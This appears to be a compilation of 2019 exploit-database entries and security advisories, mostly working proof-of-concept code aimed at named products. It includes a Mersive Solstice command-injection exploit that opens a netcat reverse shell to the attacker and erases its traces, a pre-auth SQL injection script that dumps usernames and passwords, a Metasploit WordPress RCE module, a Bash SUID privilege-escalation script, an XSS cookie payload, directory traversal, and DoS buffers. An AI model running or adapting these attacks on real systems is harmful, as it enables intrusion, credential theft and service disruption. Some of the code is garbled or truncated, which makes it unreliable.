#Exploit Title: SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)
#Exploit Author : ZwX
#Exploit Date: 2019-11-26
#Vendor Homepage : http://www.nsauditor.com/
#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
#Tested on OS: Windows 7


'''
Proof of Concept (PoC):
=======================

1.Download and install SpotAuditor
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Tools -> Base64 Encrypted Password
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Base64 Encrypted Password' and click on 'Decrypt'
6.SpotAuditor Crashed
'''
#!/usr/bin/python

http = "http//"
buffer = "\x41" * 2000


poc = http + buffer 
file = open("poc.txt","w")
file.write(poc)
file.close()

print "POC Created by ZwX"

Hi list,

CVE-2019-11932 is a vulnerability in the android-gif-drawable library. Yet
the CVE text doesn't mention "android-gif-drawable". It only mentions
WhatsApp. There could be over 28,400 free Android apps that use this
library.

And it seems that quite a few (24) of those 28k+ apps other than WhatsApp
that use android-gif-drawable have install bases just as large as the
WhatsApp install base (1 billion+, per Google Play).

In example, Viber Version from Sep 2019 (11.6.0.15) is vulnerable to
CVE-2019-11932 (double free in libpl_droidsonroids_gif) . Latest 11.9.1 not
anymore. Stacktrace from vuln version:
https://gist.github.com/marcinguy/c4ed223b27f0bd354b43ff23de875ffe

Great work was made to compile list of apps using the framework:

https://gist.github.com/wdormann/874198c1bd29c7dd2157d9fc1d858263

Patch it up folks

Nice idea would be to create shodan or Wappalyzer search engine for Android
Apps frameworks. Count me in, if you want to build something like this.


Thanks,
Marcin

HI,




I would like to report a security vulnerability in Xiaomi Mi Box (model: MIBOX3, build.id : MHC19). 

The vulnerability allows rescaling and corrupting the display without any privilege requirement, thus creating an opportunity for a non-privilege malicious app to disable the basic functionalities that the TV box is offering or can even be used for ransomeware purpose - e.g., each time a target streaming app is launched, the malicious app can corrupt the display. 





This vulnerability is due to the following:

Xiaomi introduces a (non-protected) custom API in the SystemControl system service ¡°setPosition¡± which takes as arguments 4 integers. Once invoked with maliciously set parameters, the system display will be effected; e.g.,  (500, 500, 1000,1000) for rescaling the display and (1000,1000,1000,1000) for corrupting the display. Note that the display corruption will be persistent across reboots, making it very difficult to be fixed without a hard reset.




We can exploit this API as follows:

Class ServiceManager = Class.forName("android.os.ServiceManager");

Method getService = ServiceManager.getMethod("getService", String.class);

mRemote = (IBinder) getService.invoke(null,"system_control");

Parcel localParcel1 = Parcel.obtain();

Parcel localParcel2 = Parcel.obtain();

localParcel1.writeInterfaceToken("droidlogic.ISystemControlService");

localParcel1.writeInt(500);

localParcel1.writeInt(500);

localParcel1.writeInt(1000);

localParcel1.writeInt(1000); 

mRemote.transact(16, localParcel1, localParcel2, 0);  // 16 corresponds to the API setPosition

localParcel2.recycle();

localParcel1.recycle();

# Exploit Title : Wordpress 5.3 - User Disclosure
# Author: SajjadBnd
# Date: 2019-11-17
# Software Link: https://wordpress.org/download/
# version : wp < 5.3
# tested on : Ubunutu 18.04 / python 2.7
# CVE: N/A


#!/usr/bin/python
# -*- coding: utf-8 -*-
#


import requests
import os
import re
import json
import sys
import urllib3

def clear():
    linux = 'clear'
    windows = 'cls'
    os.system([linux, windows][os.name == 'nt'])
def Banner():
        print('''
- Wordpress < 5.3 - User Enumeration
- SajjadBnd
''')
def Desc():
    url = raw_input('[!] Url >> ')
    vuln = url + "/wp-json/wp/v2/users/"
    while True:
        try:
            r = requests.get(vuln,verify=False)
            content = json.loads(r.text)
            data(content)
        except requests.exceptions.MissingSchema:
        vuln = "http://" + vuln
def data(content):
    for x in content:
    name = x["name"].encode('UTF-8')
    print("======================")
    print("[+] ID : " + str(x["id"]))
    print("[+] Name : " + name)
    print("[+] User : " + x["slug"])
    sys.exit(1)
if __name__ == '__main__':
    urllib3.disable_warnings()
    reload(sys)
    sys.setdefaultencoding('UTF8')
    clear()
    Banner()
    Desc()

wpuser.txt

#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Exploit Title : Wordpress < 5.3 - User Disclosure
# Exploit Author: SajjadBnd
# email : blackwolf@post.com
# Software Link: https://wordpress.org/download/
# version : wp < 5.3
# tested on : Ubunutu 18.04 / python 2.7

import requests
import os
import re
import json
import sys
import urllib3

def clear():
    linux = 'clear'
    windows = 'cls'
    os.system([linux, windows][os.name == 'nt'])

def Banner():
        print('''
- Wordpress < 5.3 - User Enumeration
- SajjadBnd
''')

def Desc():
    url = raw_input('[!] Url >> ')
    vuln = url + "/wp-json/wp/v2/users/"
    while True:
        try:
            r = requests.get(vuln,verify=False)
            content = json.loads(r.text)
            data(content)
      except requests.exceptions.MissingSchema:
      vuln = "http://" + vuln

def data(content):
    for x in content:
  name = x["name"].encode('UTF-8')
  print("======================")
  print("[+] ID : " + str(x["id"]))
  print("[+] Name : " + name)
  print("[+] User : " + x["slug"])
    sys.exit(1)
if __name__ == '__main__':
    urllib3.disable_warnings()
    reload(sys)
    sys.setdefaultencoding('UTF8')
    clear()
    Banner()
    Desc()

# Exploit Title: TexasSoft CyberPlanet 6.4.131 - 'CCSrvProxy' Unquoted Service Path
# Date: 2019-11-28
# Exploit Author: Cristian Ayala G
# Vendor Homepage: https://tenaxsoft.com/index.html
# Software Link: https://tenaxsoft.com/descargas.html
# Version: 6.4.131
# Tested on: Windows 10 Pro x64

##########################################################################

# Step to discover the unquoted Service:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr -i "auto" | findstr -i -v "C:\Windows\\ | findstr """
CCSrvProxy  CCSrvProxy   C:\Program Files (x86)\TenaxSoft\CyberPlanet\SrvProxy.exe  Auto
Control de impresiones Tenax  ControldeImpresiones  C:\Program Files (x86)\TenaxSoft\CyberPlanet\TenaxService64.exe  Auto

##########################################################################

# Service info:

C:\Users\user>sc qc CCSrvProxy
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: CCSrvProxy
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\TenaxSoft\CyberPlanet\SrvProxy.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : CCSrvProxy
        DEPENDENCIAS       : Spooler
        NOMBRE_INICIO_SERVICIO: LocalSystem

##########################################################################

# Exploit Title: GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC)
# Discovery by: Ivan Marmolejo
# Discovery Date: 2019-11-27
# Vendor Homepage: https://apps.apple.com/mx/app/ghia-camip/id1342090963
# Software Link: App Store for iOS devices
# Tested Version: 1.2 
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 6s iOS 13.2.3

# Summary: With GHIA CamIP you can view your cameras in real time supports conventional IPC cameras, 
# cameras with alarm, Video intercom and other devices. 


# Steps to Produce the Crash:
# 1.- Run python code: GHIA.py
# 2.- Copy content to clipboard
# 3.- Open "GHIA CamIP for iOS"
# 4.- Go to "Add"
# 5.- Wireless Settings
# 6.- Connect to the internet
# 7.- Paste Clipboard on "Password"
# 8.- WiFi Connection
# 9.- Start setting
# 10- Crashed


#!/usr/bin/env python

buffer = "\x41" * 33
print (buffer)

# Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2016-12-23
# Exploit Author: Alexandre Teyar
# Vendor Homepage: https://www2.mersive.com/
# Firmware Link: http://www.mersive.com/Support/Releases/SolsticeServer/SGE/Android/2.8.0/Solstice.apk
# Versions: 2.8.0
# Tested On: Mersive Solstice 2.8.0
# CVE: CVE-2017-12945
# Description       : This will exploit an (authenticated) blind OS command injection 
#                     vulnerability present in Solstice devices running versions
#                     of the firmware prior to 2.8.4.
# Notes             : To get the the command output (in piped-mode), a netcat listener 
#                     (e.g. 'nc -lkvp <LPORT>') needs to be launched before 
#                     running the exploit.
#                     To get an interactive root shell use the following syntax
#                     'python.exe .\CVE-2017-12945.py -pass <PASSWORD>
#                     -rh <RHOST> -p "busybox nc <LHOST> <LPORT>
#                     -e /system/bin/sh -i"'.


#!/usr/bin/env python3

import argparse
import logging
import requests
import sys
import time


def parse_args():
""" Parse and validate the command line supplied by users
"""
    parser = argparse.ArgumentParser(
                description="Solstice Pod Blind Command Injection"
            )

    parser.add_argument(
"-d",
"--debug",
        dest="loglevel",
        help="enable verbose debug mode",
        required=False,
        action="store_const",
        const=logging.DEBUG,
        default=logging.INFO
    )
    parser.add_argument(
"-lh",
"--lhost",
        dest="lhost",
        help="the listening address",
        required=False,
        type=str
    )
    parser.add_argument(
"-lp",
"--lport",
        dest="lport",
        help="the listening port - default 4444",
        required=False,
        default="4444",
        type=str
    )
    parser.add_argument(
"-p",
"--payload",
        dest="payload",
        help="the command to execute",
        required=True,
        type=str
    )
    parser.add_argument(
"-pass",
"--password",
        dest="password",
        help="the target administrator password",
        required=False,
        default="",
        type=str
    )
    parser.add_argument(
"-rh",
"--rhost",
        dest="rhost",
        help="the target address",
        required=True,
        type=str
    )

    return parser.parse_args()


def main():
    try:
        args = parse_args()

        lhost = args.lhost
        lport = args.lport
        password = args.password
        rhost = args.rhost

        logging.basicConfig(
            datefmt="%H:%M:%S",
            format="%(asctime)s: %(levelname)-8s %(message)s",
            handlers=[logging.StreamHandler()],
            level=args.loglevel
        )

        # Redirect stdout and stderr to <FILE>
        # only when the exploit is launched in piped mode
        if lhost and lport:
            payload = args.payload + "> /data/local/tmp/rce.tmp 2>&1"
            logging.info(
"attacker listening address: {}:{}".format(lhost, lport)
            )
        else:
            payload = args.payload

        logging.info("solstice pod address: {}".format(rhost))

        if password:
            logging.info(
"solstice pod administrator password: {}".format(password)
            )

        # Send the payload to be executed
        logging.info("sending the payload...")
        send_payload(rhost, password, payload)

        # Send the results of the payload execution to the attacker
        # using 'nc <LHOST> <LPORT> < <FILE>' then remove <FILE>
        if lhost and lport:
            payload = (
"busybox nc {} {} < /data/local/tmp/rce.tmp ".format(
                    lhost, lport
                )
            )

            logging.info("retrieving the results...")
            send_payload(rhost, password, payload)

            # Erase exploitation traces
            payload = "rm -f /data/local/tmp/rce.tmp"

            logging.info("erasing exploitation traces...")
            send_payload(rhost, password, payload)

    except KeyboardInterrupt:
        logging.warning("'CTRL+C' pressed, exiting...")
        sys.exit(0)


def send_payload(rhost, password, payload):
    URL = "http://{}/Config/service/saveData".format(rhost)

    headers = {
"Content-Type": "application/json",
"X-Requested-With": "XMLHttpRequest",
"Referer": "http://{}/Config/config.html".format(rhost)
    }

    data = {
"m_networkCuration":
        {
"ethernet":
            {
"dhcp": False,
"staticIP": "; {}".format(payload),
"gateway": "",
"prefixLength": 24,
"dns1": "",
"dns2": ""
            }
        },
"password": "{}".format(password)
    }

    # Debugging using the BurpSuite
    # proxies = {
    #     'http': 'http://127.0.0.1:8080',
    #     'https': 'https://127.0.0.1:8080'
    # }

    try:
        logging.info("{}".format(payload))

        response = requests.post(
            URL,
            headers=headers,
            # proxies=proxies,
            json=data
        )

        logging.debug(
"{}".format(response.json())
        )

        # Wait for the command to be executed
        time.sleep(2)

    except requests.exceptions.RequestException as ex:
        logging.error("{}".format(ex))
        sys.exit(0)


if __name__ == "__main__":
    main()

# Exploit Title: Online Inventory Manager 3.2 - Persistent Cross-Site Scripting
# Date: 2019-11-29
# Exploit Author: Cemal Cihad ÇİFTÇİ
# Vendor Homepage: https://bigprof.com
# Software Link : https://bigprof.com/appgini/applications/online-inventory-manager
# Software : Online Inventory Manager
# Version : 3.2
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# Tested on: Windows 10 Pro

# Stored XSS has been discovered in the Online Inventory Manager created by bigprof/AppGini
# editgroups section. In editgroups section
# (http://localhost/inventory/admin/pageEditGroup.php?groupID=1).

# Payload i used:
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>"

# POC: http://localhost/inventory/admin/pageViewGroups.php in this
# url you can edit the groups information with pressing onto the group name. After the edit page open
# you can enter your payload into the description field. After going back to
# the groups page you will see your Javascript code gonna run.
# This vulnerability is also exist while you are creating a new group.

#Exploit Title: SpotAuditor 5.3.2 - 'Key' Denial of Service
#Exploit Author : ZwX
#Exploit Date: 2019-11-28
#Vendor Homepage : http://www.nsauditor.com/
#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
#Tested on OS: Windows 7
#Social: twitter.com/ZwX2a

'''
Proof of Concept (PoC):
=======================

1.Download and install SpotAuditor
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.SpotAuditor Crashed
'''
#!/usr/bin/python

http = "http//"
buffer = "\x41" * 2000


poc = http + buffer 
file = open("poc.txt","w")
file.write(poc)
file.close()

print "POC Created by ZwX"


#Exploit Title: SpotAuditor 5.3.2 - 'Name' Denial Of Service
#Exploit Author : ZwX
#Exploit Date: 2019-11-28
#Vendor Homepage : http://www.nsauditor.com/
#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
#Tested on OS: Windows 7
#Social: twitter.com/ZwX2a
#contact: msk4@live.fr

'''
Proof of Concept (PoC):
=======================

1.Download and install SpotAuditor
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.SpotAuditor Crashed
'''
#!/usr/bin/python

http = "http//"
buffer = "\x41" * 2000


poc = http + buffer 
file = open("poc.txt","w")
file.write(poc)
file.close()

print "POC Created by ZwX"

# Exploit Title : Bash 5.0 Patch 11 -  SUID Priv Drop Exploit
# Date : 2019-11-29
# Original Author: Ian Pudney , Chet Ramey
# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
# Version : < Bash 5.0 Patch 11
# Tested on Linux
# Credit : Ian Pudney from Google Security and Privacy Team based on Google CTF suidbash
# CVE : 2019-18276
# CVE Link : https://nvd.nist.gov/vuln/detail/CVE-2019-18276 , https://www.youtube.com/watch?v=-wGtxJ8opa8
# Exploit Demo POC : https://youtu.be/Dbwvzbb38W0

Description :

An issue was discovered in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11.
By default, if Bash is run with its effective UID not equal to its real UID,
it will drop privileges by setting its effective UID to its real UID.
However, it does so incorrectly. On Linux and other systems that support "saved UID" functionality,
the saved UID is not dropped. An attacker with command execution in the shell can use "enable -f" for
runtime loading of a new builtin, which can be a shared object that calls setuid() and therefore
regains privileges. However, binaries running with an effective UID of 0 are unaffected.

#!/bin/bash


#Terminal Color Codes

RED='\033[0;31m'
GREEN='\033[0;32m'
NC='\033[0m'


#Get the Effective User ID (owner of the SUID /bin/bash binary)
read -p "Please enter effective user id (euid) : " euid

#Create a C file and output the exploit code
touch pwn.c
echo ""> pwn.c

cat <<EOT >> pwn.c

#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>

void __attribute((constructor)) initLibrary(void) {
        printf("Escape lib is initialized");
        printf("[LO] uid:%d | euid:%d%c", getuid(), geteuid());  
        setuid($euid);
        printf("[LO] uid%d | euid:%d%c", getuid(), geteuid());
}

EOT

echo -e  "${RED}"
echo -e "Exploit Code copied to pwn.c !\n"
sleep 5
echo -e "Compiling Exploit Object ! \n"
$(which gcc ) -c -fPIC pwn.c -o pwn.o
sleep 5
echo -e "Compiling Exploit Shared Object ! \n"
$(which gcc ) -shared -fPIC pwn.o -o libpwn.so
sleep 5
echo -e "Exploit Compiled ! \n"
sleep 5
echo -e "Executing Exploit :)  \n"
sleep 5


#Execute the Shared Library
echo -e "${RED}Run  : ${NC} enable -f ./libpwn.so asd \n"

OwnCloud version 8.1.8 (stable) are vulnerable to recovery all username
login list.


PoC:

1. Create an account in OwnCloud

2. Intercept connection with Burp

3. Share a file, typing anything

---------------------------------------------------------
4. Burp will capture this request

GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=bla*&limit=200&itemType=file
HTTP/1.1
Host: XXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
requesttoken: XXXXXXXXXXXXXXXXXXX
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Connection: close
Referer: https://domain.com/index.php/apps/files/
Cookie: XXXXXXXXXXXXXXXX
---------------------------------------------------------------------

5. Send to Repeater

6. Change GET parameter to THIS:

GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=*&limit=200&itemType=file
HTTP/1.1


7. Return valeus will be a JSON with all username informations

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::Remote::HttpClient

  Rank = ExcellentRanking

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Wordpress Plainview Activity Monitor RCE',
'Description'    => %q{
          Plainview Activity Monitor Wordpress plugin is vulnerable to OS
          command injection which allows an attacker to remotely execute
          commands on underlying system. Application passes unsafe user supplied
          data to ip parameter into activities_overview.php.
          Privileges are required in order to exploit this vulnerability.

          Vulnerable plugin version: 20161228 and possibly prior
          Fixed plugin version: 20180826
      },
'Author'  =>
        [
'LydA(c)ric LEFEBVRE', # Vulnerability discovery
'Leo LE BOUTER', # Metasploit module
        ],
'License'        => MSF_LICENSE,
'References'     =>
        [
          [ 'CVE', '2018-15877' ],
          [ 'EDB', '45274' ],
        ],
'Privileged'     => false,
'Platform'       => ['php'],
'Arch'           => ARCH_PHP,
'Payload'        =>
        {
'BadChars' => '&>\'',
        },
'Targets'        => [['WordPress', {}]],
'DisclosureDate' => 'Aug 26 2018'
      ))

      register_options(
        [
          OptString.new('USERNAME', [ true,  "The user to authenticate as"]),
          OptString.new('PASSWORD', [ true,  "The password to authenticate with" ])
        ])

      register_advanced_options(
        [
          OptBool.new('ForceExploit',  [ false, 'Override check result', false ]),
        ])
  end

  def check
    unless wordpress_and_online?
      vprint_error("#{target_uri} does not seeem to be Wordpress site")
      return CheckCode::Unknown
    end
    check_plugin_version_from_readme('plainview-activity-monitor', '20180826')
  end

  def exploit
    check_code = check
    unless check_code == CheckCode::Detected || check_code == CheckCode::Appears
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    user = datastore['USERNAME']
    password = datastore['PASSWORD']

    print_status("Trying to login...")
    cookie = wordpress_login(user, password)
    if cookie.nil?
      fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful")
    end
    print_good("Login Successful")
    store_valid_credential(user: user, private: password, proof: cookie)

    uri = normalize_uri(target_uri.path, 'wp-admin/admin.php')

    vars_get = {
'page' => 'plainview_activity_monitor',
'tab'  => 'activity_tools'
    }

    vars_post = {
'ip'     => "localhost | php -r '#{payload.encoded}'",
'lookup' => 'Lookup',
'submit' => 'Submit request'
    }

    send_request_cgi(
'method'    => 'POST',
'cookie'    => cookie,
'uri'       => uri,
'vars_get'  => vars_get,
'vars_post' => vars_post
    )
  end
end

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

=============================================
CVEID: CVE-2019-18922
NAME OF AFFECTED PRODUCT: Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047]
PROBLEM TYPE: Directory Traversal
DESCRIPTION: A Directory Traversal in the Web interface of the Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047] allows unauthenticated attackers to read arbitrary system files via a GET request. 
NOTE: This is an End-of-Life product.

=============================================

I. VULNERABILITY
- -------------------------
The Allied Telesis AT-GS950/8 Network Switch with Firmware until AT-S107 V.1.1.3 [1.00.047]
is confirmed to have an Directory Traversal Vulnerability.

II. BACKGROUND
- -------------------------
The AT-S107 Firmware is used for Configuration through an Web-Interface.

III. DESCRIPTION
- -------------------------
A GET-Request with the Path http://[IP]/../../../../../../etc/passwd shows the File-Content.

V. BUSINESS IMPACT
- -------------------------
A Attacker can read arbitrary System-Files.


VI. SYSTEMS AFFECTED
- -------------------------
Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047].

VII. CREDITS
- -------------------------
The Vulnerability has been discovered by the Security-Team at the University Bayreuth. [N. H. Sprenger, Dr. H. Benda].

VIII. LEGAL NOTICES
- -------------------------
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.

=============================================
-----BEGIN PGP SIGNATURE-----

iQEzBAEBCAAdFiEEJliv/QRedf6UzVmWtNym7A91fYQFAl3ftoYACgkQtNym7A91
fYQvcwgAqSC6BU4EFbZvSX/mFecjeEIwphIgEp3n1QPb2gwwJHA3DGYdWNzp05YD
ZytxPofVoH+bWxZWun7vMi0c4HhZHPM3CJaJmcMoahSI2FEFfytQYbhcN/oWLCl+
ahc1J062wj2lnwh7gmLrdUX0RD2oM0VVnaU4gNAYMykVGTuQVVjTi2YwHFysaz1T
zEJQXOHxrdUC4BPgaYdimpmJts4M6IxCghYRWsMOTObKFlmfMVMQpsc+OgKF34U2
aWRJQq05AE4FYYYHg81pFVcjVWRQ8ZOObEl4OgwTCY+vWwMS0BK4MZXMQkvB0y8t
b6hbNAeasEaQ4g3SrzTe5273F7HF9g==
=ZqDR
-----END PGP SIGNATURE-----

[+] Credits: hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/NAPC-XINET-ELEGANT-6-ASSET-LIBRARY-WEB-INTERFACE-PRE-AUTH-SQL-INJECTION.txt
[+] ISR: ApparitionSec          


[Vendor]
www.napc.com


[Product]
Xinet Elegant 6 Asset Library Web Interface v6.1.655

Web based interface for xinet asset management solution.


[Vulnerability Type]
Pre-Auth SQL Injection


[CVE Reference]
CVE-2019-19245


[Security Issue]
NAPC Xinet (interface) Elegant 6 Asset Library v6.1.655 allows Pre-Authentication Error based SQL Injection via the /elegant6/login LoginForm[username] field when
double quotes are used. The vulnerable version seems to be old, but it may still be possible to still find it deployed as I have.

Vulnerable Parameter: LoginForm[username] (POST) Method.


[Exploit/POC]
import requests,time,re,sys,argparse

#NAPC Xinet Elegant 6 Asset Library v6.1.655
#Pre-Auth SQL Injection 0day Exploit
#By hyp3rlinx
#ApparitionSec
#==============
#This will dump tables, usernames and passwords in vulnerable versions
#REQUIRE PARAMS: LoginForm[password]=&LoginForm[rememberMe]=0&LoginForm[username]=SQL&yt0
#SQL INJECTION VULN PARAM --> LoginForm[username]
#================================================

IP=""
PORT="80"
URL=""
NUM_INJECTS=20
k=1
j=0
TABLES=False
CREDS=False
SHOW_SQL_ERROR=False


def vuln_ver_chk():
    global IP, PORT
    TARGET = "http://"+IP+":"+PORT+"/elegant6/login"
    response = requests.get(TARGET)
    if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content):
        print "[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655."
        return True
    print "[!] Version not vulnerable :("
    return False


def sql_inject_request(SQL):

    global IP, PORT
    URL = "http://"+IP+":"+PORT+"/elegant6/login"

    tmp=""
    headers = {'User-Agent': 'Mozilla/5.0'}
    payload = {'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL}
    session = requests.Session()

    res = session.post(URL,headers=headers,data=payload)
    idx = res.content.find('CDbCommand')  # Start of SQL Injection Error in response
    idx2 = res.content.find('key 1')      # End of SQL Injection Error in response

    return res.content[idx : idx2+3]



#Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc
def inc():
    global k,j
    while j < NUM_INJECTS:
        j+=1
        if k !=1:
            k+=1
        return str(j)+','+str(k)


def tidy_up(results):
    global CREDS
    idx = results.find("'")
    if idx != -1:
        idx2 = results.rfind("'")
        if not CREDS:
            return results[idx + 1: idx2 -2]
        else:
            return results[idx + 2: idx2]



def breach(i):
    global k,j,NUM_INJECTS,SHOW_SQL_ERROR
    result=""

    #Dump Usernames & Passwords
    if CREDS:
        if i % 2 == 0:
            target='username'
        else:
            target='password'

        SQL=('"and (select 1 from(select count(*),concat((select(select concat(0x2b,'+target+'))'
'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user group by x)a)-- -')

        if not SHOW_SQL_ERROR:
            result = tidy_up(sql_inject_request(SQL))
        else:
            result = sql_inject_request(SQL)+"\n"
        print "[+] Dumping "+target+": "+result

    #Dump Tables
    if TABLES:
        while j < NUM_INJECTS:
            nums = inc()
            SQL=('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()'
'limit '+nums+'),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -')

            if not SHOW_SQL_ERROR:
                result = tidy_up(sql_inject_request(SQL))
            else:
                result = sql_inject_request(SQL) + "\n"

            print "[+] Dumping Table... " +result
            time.sleep(0.3)



def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--ip_address", help="<TARGET-IP>.")
    parser.add_argument("-p", "--port", help="Port, Default is 80")
    parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.")
    parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.")
    parser.add_argument("-m", "--max_injects", nargs="?", const="1", help="Max SQL Injection Attempts, Default is 20.")
    parser.add_argument("-s", "--show_sql_errors", nargs="?", const="1", help="Display SQL Errors, Default is Clean Dumps.")
    parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show script usage.")
    return parser.parse_args()



def usage():
    print "Dump first ten rows of usernames and passwords"
    print "NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -c -m 10\n"
    print "\nDump first five rows of database tables and show SQL errors"
    print "NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -t -m 5 -s\n"
    exit(0)


def main(args):

    global TABLES,CREDS,URL,IP,NUM_INJECTS,SHOW_SQL_ERROR

    if args.ip_address:
        IP=args.ip_address

    if args.port:
        PORT=args.port

    if args.get_tables:
        TABLES=True

    if args.creds:
        CREDS=True

    if args.max_injects:
        NUM_INJECTS = int(args.max_injects)

    if args.show_sql_errors:
        SHOW_SQL_ERROR=True

    if args.examples:
        usage()

    if vuln_ver_chk():
        for i in range(0, NUM_INJECTS):
            breach(i)
            time.sleep(0.3)


if __name__=='__main__':

    parser = argparse.ArgumentParser()

    print "NAPC Elegant 6 Asset Library v6.1.655"
    print "Pre-Authorization SQL Injection 0day Exploit"
    print "Discovery / eXploit By hyp3rlinx"
    print "ApparitionSec\n"

    time.sleep(0.5)

    if len(sys.argv)== 1:
        parser.print_help(sys.stderr)
        sys.exit(0)

    main(parse_args())



[Network Access]
Remote


[POC Video URL]
https://www.youtube.com/watch?v=mdw_sPlshmI


[Severity]
Critical


[Disclosure Timeline]
Vendor Notification: November 13, 2018
Second attempt: October 12, 2019
November 29, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec


[Vendor]www.maxpcsecure.com


[Affected Product Code Base]
Max Secure Anti Virus Plus - 19.0.4.020

File hash: ab1dda23ad3955eb18fdb75f3cbc308a
msplusx64.exe


[Vulnerability Type]
Insecure Permissions


[CVE Reference]
CVE-2019-19382


[Security Issue]
Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the
installation directory.
Local attackers or malware running at low integrity can replace a .exe
or .dll file to achieve privilege escalation.

C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT
AUTHORITY\Authenticated Users:(ID)F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F


[Affected Component]
Permissions on installation directory


[Exploit/POC]
#include <stdio.h>
#include <windows.h>
#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"

/* Max Secure Anti Virus Plus PoC By hyp3rlinx */

BOOL PWNED=FALSE;

BOOL FileExists(LPCTSTR szPath){
  DWORD dwAttrib = GetFileAttributes(szPath);
  return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib &
FILE_ATTRIBUTE_DIRECTORY));
}

void main(void){

  if(!FileExists(DISABLED_TARGET)){
    CopyFile(TARGET, TMP, FALSE);
    Sleep(1000);
    CopyFile(TMP, DISABLED_TARGET, FALSE);
    printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
    Sleep(1000);
    printf("[+] Disabled MaxSDUI.exe ...\n");
    Sleep(300);
   }else{
     PWNED=TRUE;
   }

    if(!PWNED){
       char fname[MAX_PATH];
        char newLoc[]=TARGET;
        DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
       if (size){
         printf("[+] Copying exploit to vuln dir...\n");
         Sleep(1000);
